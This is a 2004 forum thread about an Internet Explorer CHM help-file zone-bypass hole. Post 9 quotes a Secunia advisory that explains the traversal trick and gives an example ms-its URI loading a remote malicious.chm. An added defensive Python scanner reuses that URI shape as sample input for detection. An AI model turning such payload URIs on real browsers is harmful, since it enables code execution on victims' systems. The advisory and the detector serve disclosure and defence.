US-CERT Vulnerability Note VU#323070 (Internet Explorer Security Hole)
CERT ^ | 04/05/2004 | Art Manion

Posted on 04/08/2004 12:56:30 PM PDT by Salo

Beware.
1 posted on 04/08/2004 12:56:31 PM PDT by Salo
[ Post Reply | Private Reply | View Replies]

To: rdb3; Bush2000; ShadowAce; Ernest_at_the_Beach; TechJunkYard; Swordmaker
Pinging the Penguin Pinger and other interested parties.
2 posted on 04/08/2004 12:58:10 PM PDT by Salo (Revenge is for those too weak to hold a grudge.)
[ Post Reply | Private Reply | To 1 | View Replies]

To: All

Donate Here By Secure Server

3 posted on 04/08/2004 12:59:01 PM PDT by Support Free Republic (If Woody had gone straight to the police, this would never have happened!)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Salo
Can you or someone please translate this for me?

Carolyn

4 posted on 04/08/2004 12:59:17 PM PDT by CDHart
[ Post Reply | Private Reply | To 1 | View Replies]

To: Salo
Thank you.
5 posted on 04/08/2004 1:02:14 PM PDT by lilylangtree (Veni, Vidi, Vici)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Salo
One of many. Not sure if it's going to be fixed by the patches out next Tuesday or not. Microsoft won't say. Another fun one is embedding < iframe src="?" > in html (minus the spaces on the ends).
6 posted on 04/08/2004 1:02:47 PM PDT by sigSEGV
[ Post Reply | Private Reply | To 1 | View Replies]

To: CDHart
Translation: IE is very broke and Microsoft doesn't have any fixes yet. Your PC could be hijacked or erased by any web page that puts exploit code in it. Use another browser like Mozilla, Firefox, or Opera.
7 posted on 04/08/2004 1:04:24 PM PDT by sigSEGV
[ Post Reply | Private Reply | To 4 | View Replies]

To: sigSEGV
Ah, but you don't have that choice when clicking on a .chm file on a local hard drive.
8 posted on 04/08/2004 1:12:50 PM PDT by TechJunkYard
[ Post Reply | Private Reply | To 7 | View Replies]

To: TechJunkYard
This is the secunia advisory for the same problem:

Secunia Advisory: SA10523
Release Date: 2004-01-02
Last Update: 2004-04-07

http://secunia.com/advisories/10523/

Critical:
Highly critical
Impact: Security Bypass

Where: From remote

Software: Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6

Description:
Variants of the older showHelp() zone bypass vulnerability have been discovered, which potentially can be exploited to compromise a user's system.

Remote and locally installed "CHM" help files can be opened by websites via either the "showHelp()" function or certain URI handlers like "ms-its:" and "mk:@MSITStore:". Remote files can execute code in context of the "Internet" security zone whereas local files may execute code with the privileges of the logged in user.

Normally, it isn't a problem that Internet Explorer allows websites to open locally installed "CHM" files as they are considered trusted.

However, there exist two problems within the handling of "CHM" files:

1) It is possible to treat other local files as "CHM" files by using a special syntax with a double ":" appended to the file name combined with a directory traversal using the "..//" character sequence.

This has been exploited via programs such as WinAmp, Flash Player, XMLHTTP, ADODB stream and others, which allow files with arbitrary content to be placed in known locations.

2) Files, which haven't been installed locally, may still execute arbitrary code in context of the "Local Zone" by referencing a non-existent file.

Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//malicious.chm::/evil.html"

The vulnerability can be exploited in Internet Explorer including the latest versions with all patches and service packs installed.

Solution:
Remove the file association for CHM files. However, this will effectively disable Windows Help.

Use another product.

Provided and/or discovered by:
Originally reported by Arman Nayyeri.

Changelog:
2004-03-29: Added more information about variants. Updated "Solution" section and increased criticality.
2004-04-07: Added link to US-CERT vulnerability note.

Other References:
The old Internet Explorer showHelp() function vulnerability (SA8004):
http://secunia.com/advisories/8004/

US-CERT VU#323070:
http://www.kb.cert.org/vuls/id/323070

9 posted on 04/08/2004 1:48:21 PM PDT by Salo (Revenge is for those too weak to hold a grudge.)
[ Post Reply | Private Reply | To 8 | View Replies]
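
The advisory quoted in post 9 names the protocol handlers and URI shapes involved. As an added example (not part of the original post or the Secunia advisory), this defender-side check scans HTML or proxy-log text for those handlers and flags the shapes the advisory describes; the trait names, the sample input and the example.test host are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Protocol handlers named in the advisory (compared case-insensitively).
ITS_HANDLERS = ("ms-its:", "mk:@msitstore:")
URI_RE = re.compile(r"(?:ms-its:|mk:@msitstore:)[^\s\"'<>]+", re.IGNORECASE)
ALERT_TRAITS = {"directory-traversal", "local-mhtml-with-remote-chm", "remote-chm"}

def classify(uri):
    """Return the set of advisory traits present in one ITS-style URI."""
    u = unquote(uri).lower()
    traits = set()
    if not u.startswith(ITS_HANDLERS):
        return traits
    traits.add("its-handler")
    if "::" in u:
        traits.add("chm-internal-path")        # file.chm::/page syntax
    if "../" in u.replace("\\", "/"):          # also covers "..//"
        traits.add("directory-traversal")      # problem 1 in the advisory
    if re.search(r"mhtml:file://[^!]*!https?://", u):
        traits.add("local-mhtml-with-remote-chm")   # problem 2 in the advisory
    elif re.search(r"https?://", u):
        traits.add("remote-chm")
    return traits

def is_suspicious(traits):
    """A plain local help reference is not alerted on; the other shapes are."""
    return bool(traits & ALERT_TRAITS)

def scan(text):
    """Find ITS-style URIs in HTML or log text and classify each one."""
    return [(m.group(0), classify(m.group(0))) for m in URI_RE.finditer(text)]

# Constructed sample input (not captured traffic).
SAMPLE = r'''
<a href="ms-its:mhtml:file://C:\does_not_exist.mhtml!http://example.test//help.chm::/page.html">a</a>
<a href="mk:@MSITStore:C:\WINDOWS\Help\notepad.chm::/notepad.htm">b</a>
<a href="ms-its:C:\Temp\..//cache/file.dat::/page.html">c</a>
<a href="http://example.test/index.html">d</a>
'''

if __name__ == "__main__":
    for uri, traits in scan(SAMPLE):
        print("ALERT" if is_suspicious(traits) else "ok   ", sorted(traits), uri)
```
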

To: John Robinson; B Knotts; stainlessbanner; TechJunkYard; ShadowAce; Knitebane; AppyPappy; jae471; ...
The Penguin Ping.

Wanna be Penguified? Just holla!

Got root?


10 posted on 04/08/2004 2:05:22 PM PDT by rdb3 (The cornrows are gone, so now they call me "Slim Fadey"... † <><)
[ Post Reply | Private Reply | To 2 | View Replies]

To: Salo
This bears repeating:

Use a different web browser

There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs.

Systems Affected

Vendor: Microsoft Corporation
Status: Vulnerable
Date Updated: 5-Apr-2004

References

11 posted on 04/08/2004 3:22:21 PM PDT by zeugma (The Great Experiment is over.)
[ Post Reply | Private Reply | To 1 | View Replies]

To: zeugma
This bears repeating:

Use a different web browser

In its defense, MSIE does seem easier for the Pre-K and Kindergarten set to use than some of the other browsers are.

12 posted on 04/08/2004 5:09:04 PM PDT by PAR35
[ Post Reply | Private Reply | To 11 | View Replies]

To: zeugma
This bears repeating:

Use a different web browser

Don't you mean use a different OS??

Linux, OS X, Beos, DOS, Commodore 64??

13 posted on 04/08/2004 6:26:35 PM PDT by amigatec (There are no significant bugs in our software... Maybe you're not using it properly.- Bill Gates)
[ Post Reply | Private Reply | To 11 | View Replies]

To: Support Free Republic
Earlier, when I first opened this thread, my Norton intercepted Bloodhound Exploit.6 and ID'd the sender as ...."Temorary Internet Files\Content\.IE5FAQN5\Posts[3]"

You don't think you're sending this, do you?
14 posted on 04/08/2004 7:17:02 PM PDT by ninenot (Minister of Membership, TomasTorquemadaGentlemen'sClub)
[ Post Reply | Private Reply | To 3 | View Replies]

To: sigSEGV
Thank you!

Carolyn

15 posted on 04/09/2004 3:13:17 AM PDT by CDHart
[ Post Reply | Private Reply | To 7 | View Replies]

To: amigatec
Don't you mean use a different OS??

Linux, OS X, Beos, DOS, Commodore 64??

Well, yeah. I figure I beat that drum often enough though that I could give it a rest. :-)

16 posted on 04/09/2004 5:59:28 AM PDT by zeugma (The Great Experiment is over.)
[ Post Reply | Private Reply | To 13 | View Replies]

To: Salo
Surprise, Surprise, Surprise...


17 posted on 04/09/2004 4:49:05 PM PDT by AFreeBird (your mileage may vary)
[ Post Reply | Private Reply | To 1 | View Replies]

To: zeugma
Not ONLY use a different browser, but go into the Internet security settings in Internet Options, and disable or change to "prompt" ALL ActiveX settings.
18 posted on 04/09/2004 4:52:07 PM PDT by AFreeBird (your mileage may vary)
[ Post Reply | Private Reply | To 11 | View Replies]

To: rdb3
Now that is an ironic pic!

I am no penguin hater (run Fedora at home alongside my XP box and I use Linux for firewall/router functions for some clients) but the penguin don't play.

A couple mainstream (DX games) like Unreal? America's Army? Is Doom 3 going to have a Linux ver?

I am working toward some business application and simple workstation uses of Linux - but a 'frag' o/s it is not (yet anyway).
19 posted on 04/09/2004 5:04:24 PM PDT by CyberCowboy777 (We should never ever apologize for who we are, what we believe in, and what we stand for.)
[ Post Reply | Private Reply | To 10 | View Replies]

To: sigSEGV
I personally cannot stand my browser and email mixed so I run Firefox at home, but still is not in a place for me to install it on my clients' systems.

You must remember that many of the exploits of IE are because of the features of IE. Features we use every day that seem simple but when you are used to them it is hard to do without.

I might be soon though. I am very excited about Thunderbird, just needs an integrated calendar and active sync compatibility. (though my larger clients will still run Exchange/Outlook)

20 posted on 04/09/2004 5:08:53 PM PDT by CyberCowboy777 (We should never ever apologize for who we are, what we believe in, and what we stand for.)
[ Post Reply | Private Reply | To 7 | View Replies]

